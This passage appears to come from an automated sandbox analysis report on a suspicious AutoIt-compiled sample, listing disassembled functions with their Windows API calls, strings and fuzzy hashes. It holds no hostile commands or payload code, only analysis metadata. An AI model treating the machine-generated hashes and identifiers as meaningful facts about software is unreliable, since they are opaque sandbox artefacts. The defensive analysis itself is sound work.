                                                                                      • Opcode Fuzzy Hash: 040ae19cebc0dd5caf92899468f7c9b7cdcf338b2f4bb8147dcaa749bf4a1b12
                                                                                      • Instruction Fuzzy Hash: 12113D35604604EFDB20DF19D850EA5B7E6FB89320F248269F9698B2A0C771E981CF90
                                                                                      APIs
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                        • Part of subcall function 00093CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00093CCA
                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00091D4C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 624084870-1403004172
                                                                                      • Opcode ID: 48f218fa25d449ed4532bfbc120b3dc4965ff7e1b18355c8f16e913e09ca4b1c
                                                                                      • Instruction ID: c5d131cb4e1bd06b404a3620ea32c8502a6d0760f134e6c88d4b5b614eeca96a
                                                                                      • Opcode Fuzzy Hash: 48f218fa25d449ed4532bfbc120b3dc4965ff7e1b18355c8f16e913e09ca4b1c
                                                                                      • Instruction Fuzzy Hash: E901D471702219AB8F19EBA4CD55CFE77A8EF46390F040619F922672D2EA705908E760
                                                                                      APIs
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                        • Part of subcall function 00093CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00093CCA
                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00091C46
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 624084870-1403004172
                                                                                      • Opcode ID: 589fb9dffdfdc2d786bdfc869bf3e884206bd05c6df5a52da9b07bd7e0c8d225
                                                                                      • Instruction ID: c3f19aea89b4fa0db0f60621f082e408bfed9b825b981aef5d9d50f1dc6043df
                                                                                      • Opcode Fuzzy Hash: 589fb9dffdfdc2d786bdfc869bf3e884206bd05c6df5a52da9b07bd7e0c8d225
                                                                                      • Instruction Fuzzy Hash: D901A2B5B851096ADF15EBA0CE52EFF77EC9F51340F140019B916672C2EA70AE08E7B1
                                                                                      APIs
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                        • Part of subcall function 00093CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00093CCA
                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00091CC8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 624084870-1403004172
                                                                                      • Opcode ID: 40a01bef9b7892c75215fe1a631b1331f61fffc883e99efc507f1d93da88f491
                                                                                      • Instruction ID: 024ce599bdb4089758a28438e3e6c3f54b5be5e5851129f8ce2c4d47d48dbf05
                                                                                      • Opcode Fuzzy Hash: 40a01bef9b7892c75215fe1a631b1331f61fffc883e99efc507f1d93da88f491
                                                                                      • Instruction Fuzzy Hash: 6E01ADB5B8011966DF15EBA0CA02EFE77EC9B11340F540025B906B72C2EAA09F08E6B1
                                                                                      APIs
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                        • Part of subcall function 00093CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00093CCA
                                                                                      • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00091DD3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 624084870-1403004172
                                                                                      • Opcode ID: 6b3fa242396f46484c2ce2150352e3c6b7df126d99987a0de8cd488bcf39bfb8
                                                                                      • Instruction ID: c1c2085fa7ca9470441f71fe3935cc54f79c88a08129ffb4484263e525d74e8c
                                                                                      • Opcode Fuzzy Hash: 6b3fa242396f46484c2ce2150352e3c6b7df126d99987a0de8cd488bcf39bfb8
                                                                                      • Instruction Fuzzy Hash: CAF0F471B4121966DF15E7A4CD52EFF77ACAF01340F040915B922A72C2DAB0590896A0
                                                                                      APIs
                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                      • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,0008769C,?,?,?), ref: 000C9111
                                                                                        • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                                                                      • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 000C90F7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: LongWindow$MessageProcSend
                                                                                      • String ID: p]
                                                                                      • API String ID: 982171247-1923361398
                                                                                      • Opcode ID: 6259837a0159342dab81c282185acd48619630109b5ef90bffda297f264870ae
                                                                                      • Instruction ID: d1b8728a5d8dcf904e89183555395bf1c0314233c71c75b053b3013b66d8fa69
                                                                                      • Opcode Fuzzy Hash: 6259837a0159342dab81c282185acd48619630109b5ef90bffda297f264870ae
                                                                                      • Instruction Fuzzy Hash: 0401BC30100204BBEB219F14DC4AFAA3BA6FB85765F14006CFA551A2E1CB726C91CB50
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: _wcslen
                                                                                      • String ID: 3, 3, 16, 1
                                                                                      • API String ID: 176396367-3042988571
                                                                                      • Opcode ID: c35fd5f5c7995c3d12355b921b6813d8bfa43cad6b122f65076cce418de50b87
                                                                                      • Instruction ID: efb95153b906ceb65668031241f52209e4d6d6e094c974f2140b0704b9824aca
                                                                                      • Opcode Fuzzy Hash: c35fd5f5c7995c3d12355b921b6813d8bfa43cad6b122f65076cce418de50b87
                                                                                      • Instruction Fuzzy Hash: 8FE09B1661522024927112799CC29FF56C9DFC5752714182BFE89C2267EB94CDD193A1
                                                                                      APIs
                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00090B23
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Message
                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                      • API String ID: 2030045667-4017498283
                                                                                      • Opcode ID: 18516c8aa760075fc64b1de9b8477bd79cbd526c44755c3613bb8b5f3f497074
                                                                                      • Instruction ID: 4b7310273797221a175f82a3283486e221c52265c20df2247daa419c19667d45
                                                                                      • Opcode Fuzzy Hash: 18516c8aa760075fc64b1de9b8477bd79cbd526c44755c3613bb8b5f3f497074
                                                                                      • Instruction Fuzzy Hash: 15E0D8312483083AE2143754BC03FDD7A84CF05B15F10442AFB8C598C38AE2249056AD
                                                                                      APIs
                                                                                        • Part of subcall function 0004F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00050D71,?,?,?,0003100A), ref: 0004F7CE
                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,0003100A), ref: 00050D75
                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0003100A), ref: 00050D84
                                                                                      Strings
                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00050D7F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                      • API String ID: 55579361-631824599
                                                                                      • Opcode ID: 2b398439e69c63e2cf5cbc42238a085ce2bb70c51b2814f23a289d18c440b823
                                                                                      • Instruction ID: 2043778dbd4ae73c1cbb23d61b3e0be130f6dfa3a1c594e5f4f39979ad2d11f0
                                                                                      • Opcode Fuzzy Hash: 2b398439e69c63e2cf5cbc42238a085ce2bb70c51b2814f23a289d18c440b823
                                                                                      • Instruction Fuzzy Hash: 97E012742007528BE3749FB8D504B9B7BF5BF04745F048D2DE886C7652DBB9E4488BA1
APIs
• GetTempPathW.KERNEL32(00000104,?,00000001), ref: 000A302F
• GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 000A3044
Strings
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
• Opcode ID: 56e32bf441613fda17dcff451ee009647aefdc4eb858da15f85b1dbee1073fe8
• Instruction ID: bd32a276fbfac23f5fb68cde1c9268479b263714edd4c0c7418d7144954ac114
• Opcode Fuzzy Hash: 56e32bf441613fda17dcff451ee009647aefdc4eb858da15f85b1dbee1073fe8
• Instruction Fuzzy Hash: 66D05E7250032867EA20E7A4EC0EFDB3A6CDB04750F0002A1B759E6091DAB49984CAD0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: LocalTime
• String ID: %.3d$X64
• API String ID: 481472006-1077770165
• Opcode ID: 731ea787c32072eb7b3695a831c4b87af54123d9eda305c5caeb2e06b514742e
• Instruction ID: d7a5d76dcd4e4438d37f64d2fadd7cce224b589ce0241ed945bd575da81bb041
• Opcode Fuzzy Hash: 731ea787c32072eb7b3695a831c4b87af54123d9eda305c5caeb2e06b514742e
• Instruction Fuzzy Hash: 62D012A1808119F9CB60A7D0DC49DBDB37CFB28301F508563F94A92080D624C5086765
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000C232C
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 000C233F
  • Part of subcall function 0009E97B: Sleep.KERNEL32 ref: 0009E9F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: f4d484bb4074074be37f43bb75f0d8dbcb2bb621243f99d7f09fbe64c554d300
• Instruction ID: b366250a1b7fd531f4fe5c66ca88db9566a9639d639d933fcfc90b11031d30e5
• Opcode Fuzzy Hash: f4d484bb4074074be37f43bb75f0d8dbcb2bb621243f99d7f09fbe64c554d300
• Instruction Fuzzy Hash: 7AD01236794350B7F664B771DC0FFD67A149B00B14F004916B74AEA1D1C9F9A841DB54
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000C236C
• PostMessageW.USER32(00000000), ref: 000C2373
  • Part of subcall function 0009E97B: Sleep.KERNEL32 ref: 0009E9F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 47b3e9cc65be3afa2437a9568e355ce682ac7adf04a40da2e80ffb7438ea8e69
• Instruction ID: 78ddd81c65cbb5c419173e7460aa116da7a6d74a226305ad84585e3891810fbd
• Opcode Fuzzy Hash: 47b3e9cc65be3afa2437a9568e355ce682ac7adf04a40da2e80ffb7438ea8e69
• Instruction Fuzzy Hash: 58D0C9327953507AF664B771DC0FFC676149B04B14F004916B74AEA1D1C9B9A8419A54
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0006BE93
• GetLastError.KERNEL32 ref: 0006BEA1
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0006BEFC
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: 1f3773ace06fedd3c870104a1e1489b057c507dc40165f32c8aead744de13471
• Instruction ID: d02b1d0132bca92bc11f9ef8e2377df5001671b16985fe06fa05b1d2c27f2ab3
• Opcode Fuzzy Hash: 1f3773ace06fedd3c870104a1e1489b057c507dc40165f32c8aead744de13471
• Instruction Fuzzy Hash: 4E41E4B5600206AFDF718FA5CC44ABA7BE6AF42310F144179F959D71B1DB318D81CB60